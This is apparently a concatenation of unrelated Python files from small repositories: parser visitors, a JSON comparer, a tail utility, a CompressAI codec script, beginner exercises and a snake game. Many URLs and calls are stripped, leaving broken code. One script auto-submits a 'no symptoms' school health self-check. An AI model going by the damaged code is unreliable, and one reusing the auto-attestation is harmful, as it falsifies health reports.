UnitXParser#ifStatement. def visitIfStatement(self, ctx): return self.visitChildren(ctx) # Visit a parse tree produced by UnitXParser#expressionStatement. def visitExpressionStatement(self, ctx): return self.visitChildren(ctx) # Visit a parse tree produced by UnitXParser#printStatement. def visitPrintStatement(self, ctx): return self.visitChildren(ctx) # Visit a parse tree produced by UnitXParser#assertStatement. def visitAssertStatement(self, ctx): return self.visitChildren(ctx) # Visit a parse tree produced by UnitXParser#dumpStatement. def visitDumpStatement(self, ctx): return self.visitChildren(ctx) # Visit a parse tree produced by UnitXParser#borderStatement. def visitBorderStatement(self, ctx): return self.visitChildren(ctx) # Visit a parse tree produced by UnitXParser#expressionList. def visitExpressionList(self, ctx): return self.visitChildren(ctx) # Visit a parse tree produced by UnitXParser#parExpression. def visitParExpression(self, ctx): return self.visitChildren(ctx) # Visit a parse tree produced by UnitXParser#repControl. def visitRepControl(self, ctx): return self.visitChildren(ctx) # Visit a parse tree produced by UnitXParser#endRep. def visitEndRep(self, ctx): return self.visitChildren(ctx) # Visit a parse tree produced by UnitXParser#expression. def visitExpression(self, ctx): return self.visitChildren(ctx) # Visit a parse tree produced by UnitXParser#unit. def visitUnit(self, ctx): return self.visitChildren(ctx) # Visit a parse tree produced by UnitXParser#unitSingleOrPairOperator. def visitUnitSingleOrPairOperator(self, ctx): return self.visitChildren(ctx) # Visit a parse tree produced by UnitXParser#unitOperator. def visitUnitOperator(self, ctx): return self.visitChildren(ctx) # Visit a parse tree produced by UnitXParser#primary. def visitPrimary(self, ctx): return self.visitChildren(ctx) # Visit a parse tree produced by UnitXParser#literal. def visitLiteral(self, ctx): return self.visitChildren(ctx) # Visit a parse tree produced by UnitXParser#string. def visitString(self, ctx): return self.visitChildren(ctx) # Visit a parse tree produced by UnitXParser#halfString. def visitHalfString(self, ctx): return self.visitChildren(ctx) # Visit a parse tree produced by UnitXParser#number. def visitNumber(self, ctx): return self.visitChildren(ctx) # Visit a parse tree produced by UnitXParser#integer. def visitInteger(self, ctx): return self.visitChildren(ctx) # Visit a parse tree produced by UnitXParser#boolean. def visitBoolean(self, ctx): return self.visitChildren(ctx) # Visit a parse tree produced by UnitXParser#none. def visitNone(self, ctx): return self.visitChildren(ctx) ```
{ "source": "0-errors-0-warnings/mongodb-compare", "score": 3 }
#### File: 0-errors-0-warnings/mongodb-compare/ ```python import json import os def load_json_file(file_name): with open(file_name, 'r') as f: return json.load(f) def to_key(key1, key2): return f'{key1}/{key2}' def compare_items(item1, item2, key_path): #print(item1) #print(item2) for key, value in item1.items(): if key not in item2.keys(): print(f'key "{to_key(key_path, key)}" missing from target') else: if type(value) is dict: compare_items(value, item2[key], f'{to_key(key_path, key)}') elif value != item2[key]: print(f'value mismatch for key "{to_key(key_path, key)}". src: {value}, tgt: {item2[key]}') item1 = load_json_file('data/1.json') item2 = load_json_file('data/2.json') print('src: 1.json, tgt: 2.json') compare_items(item1, item2, '.') print('\n\n') print('src: 2.json, tgt: 1.json') compare_items(item2, item1, '.') ```
{ "source": "0eu/tail-assignment", "score": 3 }
#### File: tail-assignment/tail/ ```python import os from typing import Generator, TextIO BUFFER_SIZE = 1 LINE_BREAK_CHAR = "\n" def read_last_lines(fh: TextIO, lines: int = 10) -> Generator[str, None, None]:, os.SEEK_END) found_lines = 0 for offset in range(fh.tell() - 1, -1, -1): if == LINE_BREAK_CHAR: found_lines += 1 if found_lines > lines: break if found_lines <= lines: while (line := fh.readline()) and line and found_lines > 0: yield line found_lines -= 1 def follow_lines(fh: TextIO) -> Generator[str, None, None]: while True: yield from fh.readlines() ``` #### File: tail-assignment/utils/ ```python import hashlib from time import sleep from random import randint from datetime import datetime LOGS_FILENAME = 'tests/test_data/logs_stream.log' DELIMITER = '\t' LINE_BREAKER = '\n' def write(log_filename: str, logs): with open(log_filename, 'a') as file_handler: for log in logs: file_handler.write(log) def generate_logs(count: int): assert count > 0, "Number of log entries should be more than 0" return (generate_row() for _ in range(count)) def generate_row(): return DELIMITER.join((get_today_date(), generate_random_hash(), LINE_BREAKER)) def get_today_date(): return"%d/%m/%y %H:%M:%S") def generate_random_hash() -> str: return hashlib.md5(str(randint(1, 1000)).encode()).hexdigest() def main(): while True: sleep_duration = randint(1, 5) logs_count = randint(20, 25) print(f'Writing {logs_count} logs to {LOGS_FILENAME}') write(LOGS_FILENAME, generate_logs(logs_count)) sleep(sleep_duration) if __name__ == '__main__': main() ```
{ "source": "0ev/TempCheck", "score": 3 }
#### File: TempCheck/app/ ```python import requests from bs4 import BeautifulSoup global USER_AGENT USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0" def initialize(s): headers = { 'User-Agent': USER_AGENT, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3', 'DNT': '1', 'Connection': 'keep-alive', 'Upgrade-Insecure-Requests': '1', 'Pragma': 'no-cache', 'Cache-Control': 'no-cache', } response = s.get('', headers=headers) def get_login_token(s): headers = { 'User-Agent': USER_AGENT, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3', 'Referer': '', 'Connection': 'keep-alive', 'Upgrade-Insecure-Requests': '1', 'Pragma': 'no-cache', 'Cache-Control': 'no-cache', } response = s.get('', headers=headers) soup = BeautifulSoup(response.text, 'html.parser') result = soup.find_all('input', {"name":"__RequestVerificationToken"})[-1]["value"] return result def make_data(login_token,id,password): return f'''-----------------------------<PASSWORD>1506 Content-Disposition: form-data; name="__RequestVerificationToken" {login_token} -----------------------------325333128821718686562724141506 Content-Disposition: form-data; name="UserId" {str(id)} -----------------------------325333128821718686562724141506 Content-Disposition: form-data; name="Password" {str(password)} -----------------------------325333128821718686562724141506 Content-Disposition: form-data; name="UserType" 학생 -----------------------------325333128821718686562724141506-- ''' def login(s,login_token,id,password): headers = { 'User-Agent': USER_AGENT, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3', 'Content-Type': 'multipart/form-data; boundary=---------------------------325333128821718686562724141506', 'Origin': '', 'DNT': '1', 'Connection': 'keep-alive', 'Referer': '', 'Upgrade-Insecure-Requests': '1', 'Pragma': 'no-cache', 'Cache-Control': 'no-cache', } response ='', data = make_data(login_token,id,password).encode("utf-8"), headers=headers) def get_check_token(s): headers = { 'User-Agent': USER_AGENT, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3', 'Referer': '', 'Connection': 'keep-alive', 'Upgrade-Insecure-Requests': '1', 'Pragma': 'no-cache', 'Cache-Control': 'no-cache', } response = s.get('', headers=headers) soup = BeautifulSoup(response.text, 'html.parser') result = soup.find_all('input', {"name":"__RequestVerificationToken"})[-1]["value"] return result def check(s,check_token,okay): okay_data = { '__RequestVerificationToken': check_token, 'SelfCheckItemDatas[0].Order': '1', 'SelfCheckItemDatas[1].Order': '2', 'SelfCheckItemDatas[2].Order': '3', 'survey_q1': 'False', 'SelfCheckItemDatas[0].CheckResultValues[0]': '0', 'survey_q2': 'False', 'SelfCheckItemDatas[1].CheckResultValues[0]': '0', 'survey_q3': 'False', 'SelfCheckItemDatas[2].CheckResultValues[0]': '0' } not_okay_data = { '__RequestVerificationToken': check_token, 'SelfCheckItemDatas[0].Order': '1', 'SelfCheckItemDatas[1].Order': '2', 'SelfCheckItemDatas[2].Order': '3', 'survey_q1': 'True', 'SelfCheckItemDatas[0].CheckResultValues[0]': '1', 'survey_q2': 'True', 'SelfCheckItemDatas[1].CheckResultValues[0]': '1', 'survey_q3': 'True', 'SelfCheckItemDatas[2].CheckResultValues[0]': '1' } if okay: data = okay_data elif not okay: data = not_okay_data headers = { 'User-Agent': USER_AGENT, 'Accept': '*/*', 'Accept-Language': 'ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3', 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', 'X-Requested-With': 'XMLHttpRequest', 'Origin': '', 'Connection': 'keep-alive', 'Referer': '', 'Pragma': 'no-cache', 'Cache-Control': 'no-cache', } response ='', headers=headers, data=data) return response.json() def run(id,password): with requests.Session() as s: login_token = "<PASSWORD>" login(s,login_token,id,password) check_token = get_check_token(s) result = check(s, check_token, True) return result ```
{ "source": "0F0F/CompressAI", "score": 2 }
#### File: CompressAI/examples/ ```python import argparse import struct import sys import time import math import random import shutil import sys from pathlib import Path import torch import torch.nn as nn import torch.optim as optim import torch.nn.functional as F from PIL import Image from torchvision.transforms import ToPILImage, ToTensor from import DataLoader from torchvision import transforms import compressai from compressai.datasets import ImageFolder from compressai.layers import GDN from compressai.models import CompressionModel from compressai.models.utils import conv, deconv, update_registered_buffers from compressai.entropy_models import EntropyBottleneck, GaussianConditional from compressai.transforms import RGB2YCbCr, YCbCr2RGB# tensor -> tensor from compressai.models import ScaleHyperprior metric_ids = { "mse": 0, } # From Balle's tensorflow compression examples SCALES_MIN = 0.11 SCALES_MAX = 256 SCALES_LEVELS = 64 def get_scale_table( min=SCALES_MIN, max=SCALES_MAX, levels=SCALES_LEVELS ): # pylint: disable=W0622 return torch.exp(torch.linspace(math.log(min), math.log(max), levels)) class ScaleHyperprior_YUV(CompressionModel): r"""Scale Hyperprior model from <NAME>, <NAME>, <NAME>, <NAME>, <NAME>: `"Variational Image Compression with a Scale Hyperprior" <>`_ Int. Conf. on Learning Representations (ICLR), 2018. Args: N (int): Number of channels M (int): Number of channels in the expansion layers (last layer of the encoder and last layer of the hyperprior decoder) """ def __init__(self, N, M, **kwargs): super().__init__(entropy_bottleneck_channels=N, **kwargs) self.rgb2yuv = RGB2YCbCr() self.yuv2rgb = YCbCr2RGB() _N = N // 2 _M = M // 2 # LUMA self.g_a_luma = nn.Sequential( conv(1, _N), GDN(_N), conv(_N, _N), GDN(_N), conv(_N, _N), GDN(_N), conv(_N, _M), ) self.g_s_luma = nn.Sequential( deconv(_M, _N), GDN(_N, inverse=True), deconv(_N, _N), GDN(_N, inverse=True), deconv(_N, _N), GDN(_N, inverse=True), deconv(_N, 1), ) # CHROMA self.g_a_chroma = nn.Sequential( conv(2, _N), GDN(_N), conv(_N, _N), GDN(_N), conv(_N, _N), GDN(_N), conv(_N, _M), ) self.g_s_chroma = nn.Sequential( deconv(_M, _N), GDN(_N, inverse=True), deconv(_N, _N), GDN(_N, inverse=True), deconv(_N, _N), GDN(_N, inverse=True), deconv(_N, 2), ) # HYPERPRIOR -> concat luma and chroma self.h_a = nn.Sequential( conv(M, N, stride=1, kernel_size=3), nn.ReLU(inplace=True), conv(N, N), nn.ReLU(inplace=True), conv(N, N), ) self.h_s = nn.Sequential( deconv(N, N), nn.ReLU(inplace=True), deconv(N, N), nn.ReLU(inplace=True), conv(N, M, stride=1, kernel_size=3), nn.ReLU(inplace=True), ) self.gaussian_conditional = GaussianConditional(None) self.N = int(N) self.M = int(M) def forward(self, x): x_yuv = self.rgb2yuv(x).squeeze(0) # shape: [1, 3, w, h] x_luma, x_u, x_v = x_yuv.chunk(3, 1) # y, u, v -> [1, 1, w, h] x_chroma =, x_v), dim=1) # uv -> [1, 2, w, h] y_luma = self.g_a_luma(x_luma) # [1, M/2, w/16, h/16] y_chroma = self.g_a_chroma(x_chroma) # [1, M/2, w/16, h/16] y =, y_chroma), dim=1) # [1, M, w/16, h/16] z = self.h_a(torch.abs(y)) z_hat, z_likelihoods = self.entropy_bottleneck(z) scales_hat = self.h_s(z_hat) y_hat, y_likelihoods = self.gaussian_conditional(y, scales_hat) # [1, M, w/16, h/16] y_hat_luma1, y_hat_luma2, y_hat_u, y_hat_v = y_hat.chunk(4, 1) # [1, M/4, w/16, h/16] y_hat_luma =, y_hat_luma2), dim=1) # [1, M/2, w/16, h/16] y_hat_chroma =, y_hat_v), dim=1) # [1, M/2, w/16, h/16] x_hat_luma = self.g_s_luma(y_hat_luma) x_hat_chroma = self.g_s_chroma(y_hat_chroma) x_hat_yuv =, x_hat_chroma), dim=1) x_hat = self.yuv2rgb(x_hat_yuv) return { "x_hat": x_hat, "likelihoods": {"y": y_likelihoods, "z": z_likelihoods}, } def load_state_dict(self, state_dict): # Dynamically update the entropy bottleneck buffers related to the CDFs update_registered_buffers( self.entropy_bottleneck, "entropy_bottleneck", ["_quantized_cdf", "_offset", "_cdf_length"], state_dict, ) update_registered_buffers( self.gaussian_conditional, "gaussian_conditional", ["_quantized_cdf", "_offset", "_cdf_length", "scale_table"], state_dict, ) super().load_state_dict(state_dict) @classmethod def from_state_dict(cls, state_dict): """Return a new model instance from `state_dict`.""" N = state_dict["g_a_luma.0.weight"].size(0) * 2 M = state_dict["g_a_luma.6.weight"].size(0) * 2 net = cls(N, M) net.load_state_dict(state_dict) return net def update(self, scale_table=None, force=False): if scale_table is None: scale_table = get_scale_table() self.gaussian_conditional.update_scale_table(scale_table, force=force) super().update(force=force) def compress(self, x): x_yuv = self.rgb2yuv(x) # shape: [1, 3, w, h] x_luma, x_u, x_v = x_yuv.chunk(3, 1) # y, u, v -> [1, 1, w, h] x_chroma =, x_v), dim=1) # uv -> [1, 2, w, h] y_luma = self.g_a_luma(x_luma) # [1, M/2, w/16, h/16] y_chroma = self.g_a_chroma(x_chroma) # [1, M/2, w/16, h/16] y =, y_chroma), dim=1) # [1, M, w/16, h/16] z = self.h_a(torch.abs(y)) z_strings = self.entropy_bottleneck.compress(z) z_hat = self.entropy_bottleneck.decompress(z_strings, z.size()[-2:]) scales_hat = self.h_s(z_hat) indexes = self.gaussian_conditional.build_indexes(scales_hat) y_strings = self.gaussian_conditional.compress(y, indexes) return {"strings": [y_strings, z_strings], "shape": z.size()[-2:]} def decompress(self, strings, shape): assert isinstance(strings, list) and len(strings) == 2 z_hat = self.entropy_bottleneck.decompress(strings[1], shape) scales_hat = self.h_s(z_hat) indexes = self.gaussian_conditional.build_indexes(scales_hat) y_hat = self.gaussian_conditional.decompress(strings[0], indexes) y_hat_luma1, y_hat_luma2, y_hat_u, y_hat_v = y_hat.chunk(4, 1) # [1, M/4, w/16, h/16] y_hat_luma =, y_hat_luma2), dim=1) # [1, M/2, w/16, h/16] y_hat_chroma =, y_hat_v), dim=1) # [1, M/2, w/16, h/16] x_hat_luma = self.g_s_luma(y_hat_luma) x_hat_chroma = self.g_s_chroma(y_hat_chroma) x_hat_chroma =, x_hat_chroma), dim=1) x_hat = self.yuv2rgb(x_hat_chroma) return {"x_hat": x_hat} def inverse_dict(d): # We assume dict values are unique... assert len(d.keys()) == len(set(d.keys())) return {v: k for k, v in d.items()} def filesize(filepath: str) -> int: if not Path(filepath).is_file(): raise ValueError(f'Invalid file "{filepath}".') return Path(filepath).stat().st_size def load_image(filepath: str) -> Image.Image: return"RGB") def img2torch(img: Image.Image) -> torch.Tensor: return ToTensor()(img).unsqueeze(0) def torch2img(x: torch.Tensor) -> Image.Image: return ToPILImage()(x.clamp_(0, 1).squeeze()) def write_uints(fd, values, fmt=">{:d}I"): fd.write(struct.pack(fmt.format(len(values)), *values)) def write_uchars(fd, values, fmt=">{:d}B"): fd.write(struct.pack(fmt.format(len(values)), *values)) def read_uints(fd, n, fmt=">{:d}I"): sz = struct.calcsize("I") return struct.unpack(fmt.format(n), * sz)) def read_uchars(fd, n, fmt=">{:d}B"): sz = struct.calcsize("B") return struct.unpack(fmt.format(n), * sz)) def write_bytes(fd, values, fmt=">{:d}s"): if len(values) == 0: return fd.write(struct.pack(fmt.format(len(values)), values)) def read_bytes(fd, n, fmt=">{:d}s"): sz = struct.calcsize("s") return struct.unpack(fmt.format(n), * sz))[0] def get_header(model_name, metric, quality): """Format header information: - 1 byte for model id - 4 bits for metric - 4 bits for quality param """ metric = 0 code = (metric << 4) | (quality - 1 & 0x0F) return 0, code #return model_ids[model_name], code def parse_header(header): """Read header information from 2 bytes: - 1 byte for model id - 4 bits for metric - 4 bits for quality param """ model_id, code = header quality = (code & 0x0F) + 1 metric = code >> 4 return ( "YUV", inverse_dict(metric_ids)[metric], quality, ) def pad(x, p=2 ** 6): h, w = x.size(2), x.size(3) H = (h + p - 1) // p * p W = (w + p - 1) // p * p padding_left = (W - w) // 2 padding_right = W - w - padding_left padding_top = (H - h) // 2 padding_bottom = H - h - padding_top return F.pad( x, (padding_left, padding_right, padding_top, padding_bottom), mode="constant", value=0, ) def crop(x, size): H, W = x.size(2), x.size(3) h, w = size padding_left = (W - w) // 2 padding_right = W - w - padding_left padding_top = (H - h) // 2 padding_bottom = H - h - padding_top return F.pad( x, (-padding_left, -padding_right, -padding_top, -padding_bottom), mode="constant", value=0, ) def _encode(image, metric, quality, coder, output): compressai.set_entropy_coder(coder) #def _encode(image, quality, output, metric="mse"): enc_start = time.time() img = load_image(image) start = time.time() checkpoint_path = "../params/{}/checkpoint.pth.tar".format(quality) state_dict = torch.load(checkpoint_path)["state_dict"] net = ScaleHyperprior_YUV(192, 320) net.load_state_dict(state_dict) net = net.eval() net.update() load_time = time.time() - start x = img2torch(img) h, w = x.size(2), x.size(3) p = 64 # maximum 6 strides of 2 x = pad(x, p) with torch.no_grad(): out = net.compress(x) shape = out["shape"] header = get_header("YUV", metric, quality) with Path(output).open("wb") as f: write_uchars(f, header) # write original image size write_uints(f, (h, w)) # write shape and number of encoded latents write_uints(f, (shape[0], shape[1], len(out["strings"]))) for s in out["strings"]: write_uints(f, (len(s[0]),)) write_bytes(f, s[0]) enc_time = time.time() - enc_start size = filesize(output) bpp = float(size) * 8 / (img.size[0] * img.size[1]) print( f"{bpp:.3f} bpp |" f" Encoded in {enc_time:.2f}s (model loading: {load_time:.2f}s)" ) def _decode(inputpath, coder, show, output=None): compressai.set_entropy_coder(coder) #def _decode(inputpath, show, output=None): dec_start = time.time() with Path(inputpath).open("rb") as f: model, metric, quality = parse_header(read_uchars(f, 2)) original_size = read_uints(f, 2) shape = read_uints(f, 2) strings = [] n_strings = read_uints(f, 1)[0] for _ in range(n_strings): s = read_bytes(f, read_uints(f, 1)[0]) strings.append([s]) print(f"Model: {model:s}, metric: {metric:s}, quality: {quality:d}") start = time.time() checkpoint_path = "../params/{}/checkpoint.pth.tar".format(quality) state_dict = torch.load(checkpoint_path)["state_dict"] net = ScaleHyperprior_YUV(192, 320) net.load_state_dict(state_dict) net = net.eval() net.update() load_time = time.time() - start with torch.no_grad(): out = net.decompress(strings, shape) x_hat = crop(out["x_hat"], original_size) img = torch2img(x_hat) dec_time = time.time() - dec_start print(f"Decoded in {dec_time:.2f}s (model loading: {load_time:.2f}s)") if show: show_image(img) if output is not None: def encode(argv): parser = argparse.ArgumentParser(description="Encode image to bit-stream") parser.add_argument("image", type=str) parser.add_argument( "-m", "--metric", choices=["mse"], default="mse", help="metric trained against (default: %(default)s", ) parser.add_argument( "-q", "--quality", choices=list(range(1, 4)), type=int, default=3, help="Quality setting (default: %(default)s)", ) parser.add_argument( "-c", "--coder", choices=compressai.available_entropy_coders(), default=compressai.available_entropy_coders()[0], help="Entropy coder (default: %(default)s)", ) parser.add_argument("-o", "--output", help="Output path") args = parser.parse_args(argv) if not args.output: args.output = Path(Path(args.image).resolve().name).with_suffix(".bin") _encode(args.image, args.metric, args.quality, args.coder, args.output) def decode(argv): parser = argparse.ArgumentParser(description="Decode bit-stream to imager") parser.add_argument("input", type=str) parser.add_argument( "-c", "--coder", choices=compressai.available_entropy_coders(), default=compressai.available_entropy_coders()[0], help="Entropy coder (default: %(default)s)", ) parser.add_argument("--show", action="store_true") parser.add_argument("-o", "--output", help="Output path") args = parser.parse_args(argv) _decode(args.input, args.coder,, args.output) def parse_args(argv): parser = argparse.ArgumentParser(description="") parser.add_argument("command", choices=["encode", "decode"]) args = parser.parse_args(argv) return args def main(argv): args = parse_args(argv[1:2]) argv = argv[2:] torch.set_num_threads(1) # just to be sure if args.command == "encode": encode(argv) elif args.command == "decode": decode(argv) if __name__ == "__main__": main(sys.argv) ```
{ "source": "0Fernando0/CursoPython", "score": 4 }
#### File: PARTE_3/EX022/ ```python def escreva(esc): a = '~' while len(a) != len(esc): a += '~' print(a) print(esc) print(a) escreva('Fernando') ``` #### File: PARTE_3/EX023/ ```python for c in range(1,11,1): print(f'{c}',end=' ') print('FIM') for c in range(10,-1,-2): print(f'{c}',end=' ') print('FIM') print('agora é sua vez de personalizar a contagem!') us = int(input('inicio: ')) us2 = int(input('fim: ')) us3 = int(input('intervalo: ')) def contador(us,us2,us3): if us > us2 and us3 == 0: for c in range(us,us2-1,-1): print(f'{c}',end=' ') print('FIM') else: if us3 == 0: for c in range(us,us2+1,1): print(f'{c}',end=' ') print('FIM') elif us > us2: for c in range(us,us2-1,-us3): print(f'{c}',end=' ') print('FIM') else: for c in range(us,us2+1,us3): print(f'{c}',end=' ') print('FIM') contador(us,us2,us3) ``` #### File: PARTE_3/EX026/ ```python from datetime import date def voto(n): from datetime import time idade = - n if idade >= 16 and idade < 18 or idade > 60: return print(f'com {idade} anos: VOTO OPCIONAL!') elif idade >= 18 and idade <= 60: return print(f'com {idade} anos: VOTO OBRIGATORIO!') else: return print(f'com {idade} anos: VOTO NEGADO!') voto(int(input('Em que ano você nasceu? '))) ``` #### File: Portifolio/validador_cpf/ ```python def validar_cpf(cpf): numero_cpf = cpf[:-2] #cpf sem os 2 ultimos números soma = soma_2 = 0 #variavel para somar os numeros do laço #laço para verificar numeros de numeros_cpf for p,numero in enumerate(range(10,1,-1)): #laço range com enumerate que começa no 10 e vai reduzindo 1 ate chegar no 2 soma += int(numero_cpf[p])*numero #variavel soma que pega o inteiro(do numero_cpf[na posição 0,1,2...]) vezes o numero(10,9,8...) res_1 = 11 - (soma % 11) #variavel que realiza o calculo de validação numero_cpf += str(res_1) #agora adicionei em forma de string o calculo acima no numero_cpf for c,valor in enumerate(range(11,1,-1)): #outro laço, faz a mesma coisa que o laço acima com a alteração que começa no 11 soma_2 += int(numero_cpf[c]) * valor #faz a mesmo que a outra variavel soma res_2 = 11 - (soma_2 % 11) # tambem realiza o mesmo calculo que o res_1 numero_cpf += str(res_2) # novamente adicionei em string o res_2 ao numero_cpf #verificando se o numero_cpf é igual(==) ao cpf de entranda da função print('CPF VALIDO') if numero_cpf == cpf else print('CPF INVALIDO') return ```
{ "source": "0Franky/snAIke", "score": 4 }
#### File: 0Franky/snAIke/ ```python import traceback import math import random import numpy as np from snake import * class Map: """Map class""" def __init__(self, snake): self.structure = MAP # matrix of 0 and 1 representing the map self.snake = snake # snake evolving in the map = [random.randint(8, 12), random.randint(8, 12)] # food (list of 2 coordinates) def update(self): """ Checks for collision between snake's head and walls or food Takes the right action in case of collision """ snake_head_x, snake_head_y = self.snake.head snake_pos = self.structure[snake_head_y][snake_head_x] # print("snake_head_x POST") # print(snake_head_x) if [snake_head_x, snake_head_y] == # if snake's head is on food self.snake.grow() # snake grows and new food is created self.add_food(random.randint(0, SPRITE_NUMBER - 1), random.randint(0, SPRITE_NUMBER - 1)) elif snake_pos == WALL: # if snake's head is on wall, snek is ded self.snake.alive = False def add_food(self, block_x, block_y): """ Adds food on (block_x, block_y) position """ = [block_x, block_y] try: if self.structure[block_x][block_y] == 0: # checks if food will spawn in a free space (no wall, wall bad) for i in self.snake.body: # checks if food will spawn where the snake is if i == [block_x, block_y]: print('Food spawned in snek, respawning...') self.add_food(random.randint(0, SPRITE_NUMBER - 1), random.randint(0, SPRITE_NUMBER - 1)) else: print('Food spawned in wall, respawning...') self.add_food(random.randint(0, SPRITE_NUMBER - 1), random.randint(0, SPRITE_NUMBER - 1)) except Exception: traceback.print_exc() pygame.quit() def render(self, window): """ Renders the map (background, walls and food) on the game window and calls render() of snake Very very very unoptimized since render does not affect the genetic algorithm :param window: surface window """ wall = pygame.image.load(IMAGE_WALL).convert() # loading images food = pygame.image.load(IMAGE_FOOD).convert_alpha() window.fill([0,0,0]) # painting background num_line = 0 for line in self.structure: # running through the map structure num_case = 0 for sprite in line: x = num_case * SPRITE_SIZE y = num_line * SPRITE_SIZE if sprite == 1: # displaying wall window.blit(wall, (x, y)) if == [num_case, num_line]: # displaying food window.blit(food, (x, y)) num_case += 1 num_line += 1 self.snake.render(window) # snake will be rendered on above the map def scan(self): """ Scans the snake's environment into the 'scan' variable (list of lists) and gives it to snake's vision Notes: - 7 first inputs are for walls, 7 next for food, 7 last for itself (its body) - Food is seen across all the map, walls and body are seen in range of 10 blocks max - This method is long and I do not factorise much for performance issues, the structure is easily understandable anyway :return: nothing but gives vision to the snake """ def scan_wall(direction_x, direction_y, direction_range): """ Looks for a wall in the direction given in parameters for 10 steps max I decided to use inner methods for a compromise between performance and factorisation :param direction_x: direction in x axis, can be 1, 0 or -1 for "right", "stay" and "left" respectively :param direction_y: direction in y axis, can be 1, 0 or -1 for "down", "stay" and "up" respectively :param direction_range: maximum range to scan :return: number with 0 value if nothing or 1/distance to wall if wall's detected """ res = 0 for i in range(1, 10): # looking up to 10 blocks max step_x = head_x + i * direction_x # coordinates of next block to check step_y = head_y + i * direction_y if i < direction_range: if structure[step_y][step_x] == WALL: # if wall is detected in current block res = 1 / distance((head_x, head_y), (step_x, step_y)) # returns 1/distance to the block return res def scan_self(direction_x, direction_y, direction_range): """ Looks for a snake's body block in the direction given in parameters for 10 steps max :params see "scan_wall", same params :return: number with 0 value if nothing or 1/distance to body if a body block is detected """ res = 0 for i in range(1, 10): step_x = head_x + i * direction_x step_y = head_y + i * direction_y if i < direction_range: if [step_x, step_y] in snake_body: res = max(res, 1 / distance((head_x, head_y), (step_x, step_y))) return res def scan_food(direction_x, direction_y, direction_range): """ Looks for food in the direction given in parameters until range is reached :params see "scan_wall", same params :return: number with 0 value if nothing or 1/distance to body if a body block is detected """ res = 0 for i in range(1, direction_range): if food_x == (head_x + i * direction_x) and food_y == (head_y + i * direction_y): res = 1 return res scan = [[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0],[0]] # default value structure = self.structure snake_body = self.snake.body # making local variables for readability and performance head_x = self.snake.head[0] head_y = self.snake.head[1] food_x =[0] food_y =[1] forward_x = self.snake.direction[0] # calculating each coordinate for each 7 directions forward_y = self.snake.direction[1] # since the snake sees in FIRST PERSON right_x = -forward_y right_y = forward_x left_x = forward_y # for example, if snake's looking in [1,0] direction (down) left_y = -forward_x # its left is [1,0] (right for us because we look from above) forward_right_x = forward_x + right_x forward_right_y = forward_y + right_y forward_left_x = forward_x + left_x forward_left_y = forward_y + left_y # see class for better explanations backward_right_x = -forward_left_x backward_right_y = -forward_left_y backward_left_x = -forward_right_x backward_left_y = -forward_right_y forward_range = (20 - (forward_x * head_x + forward_y * head_y) - 1) % 19 + 1 # computing max range backward_range = 21 - forward_range # for each direction right_range = (20 - (right_x * head_x + right_y * head_y) - 1) % 19 + 1 left_range = 21 - right_range forward_right_range = min(forward_range, right_range) # values are hard encoded forward_left_range = min(forward_range, left_range) # since I'm not planning on making it modifiable backward_right_range = min(backward_range, right_range) backward_left_range = min(backward_range, left_range) scan[0][0] = scan_wall(forward_x, forward_y, forward_range) # scanning walls in all directions scan[1][0] = scan_wall(right_x, right_y, right_range) scan[2][0] = scan_wall(left_x, left_y, left_range) scan[3][0] = scan_wall(forward_right_x, forward_right_y, forward_right_range) scan[4][0] = scan_wall(forward_left_x, forward_left_y, forward_left_range) scan[5][0] = scan_wall(backward_right_x, backward_right_y, backward_right_range) scan[6][0] = scan_wall(backward_left_x, backward_left_y, backward_left_range) scan[7][0] = scan_food(forward_x, forward_y, forward_range) # scanning food in all directions scan[8][0] = scan_food(right_x, right_y, right_range) scan[9][0] = scan_food(left_x, left_y, left_range) scan[10][0] = scan_food(forward_right_x, forward_right_y, forward_right_range) scan[11][0] = scan_food(forward_left_x, forward_left_y, forward_left_range) scan[12][0] = scan_food(backward_right_x, backward_right_y, backward_right_range) scan[13][0] = scan_food(backward_left_x, backward_left_y, backward_left_range) scan[14][0] = scan_self(forward_x, forward_y, forward_range) # scanning body in all directions scan[15][0] = scan_self(right_x, right_y, right_range) scan[16][0] = scan_self(left_x, left_y, left_range) scan[17][0] = scan_self(forward_right_x, forward_right_y, forward_right_range) scan[18][0] = scan_self(forward_left_x, forward_left_y, forward_left_range) scan[19][0] = scan_self(backward_right_x, backward_right_y, backward_right_range) scan[20][0] = scan_self(backward_left_x, backward_left_y, backward_left_range) = scan # gives snake vision @jit(nopython=True) def distance(p1=None, p2=None): """ Gives euclidian distance between two points @jit is used to speed up computation :param p1: origin point :param p2: end point :return: distance """ return math.sqrt((p2[0] - p1[0]) ** 2 + (p2[1] - p1[1]) ** 2) ```
{ "source": "0-gb/Mind-Reading-AI", "score": 3 }
#### File: 0-gb/Mind-Reading-AI/ ```python from sklearn.naive_bayes import GaussianNB from tkinter import Tk, Label import random def get_id_dictionary(allowed_symbols_local): vocab = sorted(set(allowed_symbols_local)) constructed_char_2_int = {} constructed_int_2_char = {} counter = 0 for letter in vocab: constructed_char_2_int[letter] = counter constructed_int_2_char[counter] = letter counter += 1 return constructed_char_2_int, constructed_int_2_char def preprocess_char(char): global correct_count selected_key = char_2_int[char.capitalize()] prediction_correct = predicted_key == selected_key if prediction_correct: correct_count += 1 return selected_key, prediction_correct, correct_count def step_preprocess_x_y(learn_X, learn_Y, selected_key): learn_X.pop(0) learn_Y.pop(0) learn_X.append(X_advanced) learn_Y.append(selected_key) return learn_X, learn_Y def create_next_x(learn_X, selected_key, prediction_correct): X_advanced = learn_X[-1][1:-1] X_advanced.append(selected_key) X_advanced.append(prediction_correct) return X_advanced def 